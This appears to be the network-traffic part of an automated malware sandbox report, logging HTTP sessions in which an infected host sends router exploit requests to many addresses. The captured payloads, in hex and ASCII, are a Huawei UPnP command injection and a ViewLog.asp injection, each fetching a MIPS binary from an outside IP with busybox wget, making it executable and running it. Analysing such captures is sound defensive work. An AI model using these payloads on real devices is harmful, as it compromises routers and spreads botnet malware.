                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:15:02.409096003 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:15:14.440701008 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:15:38.759593010 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:16:27.909490108 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3192.168.2.143277231.136.62.28080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:14:52.258985996 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:14:55.497505903 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:01.641144991 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:13.672650099 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:38.759844065 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:27.909636021 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4192.168.2.143891462.163.178.2478080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:14:52.261421919 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:14:52.469569921 CET401INHTTP/1.1 404 Not Found
                                              Date: Thu, 23 Nov 2023 05:05:05 GMT
                                              Server: Boa/0.94.14rc21
                                              Accept-Ranges: bytes
                                              Connection: close
                                              Content-Type: text/html; charset=ISO-8859-1
                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                              Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>404 Not Found</H1>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</BODY></HTML>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5192.168.2.145397662.94.214.128080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:14:52.274080992 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:14:52.546111107 CET398INHTTP/1.0 404 Not Found
                                              Date: Thu, 23 Nov 2023 06:17:25 GMT
                                              Server: Boa/0.94.13
                                              X-Frame-Options: Deny
                                              Connection: close
                                              Content-Type: text/html; charset=ISO-8859-1
                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                              Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>404 Not Found</H1>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</BODY></HTML>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6192.168.2.144570285.23.227.718080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:14:52.277149916 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7192.168.2.145254831.136.130.1258080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:14:52.450067997 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:14:53.033492088 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:14:54.153448105 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:14:56.521353006 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
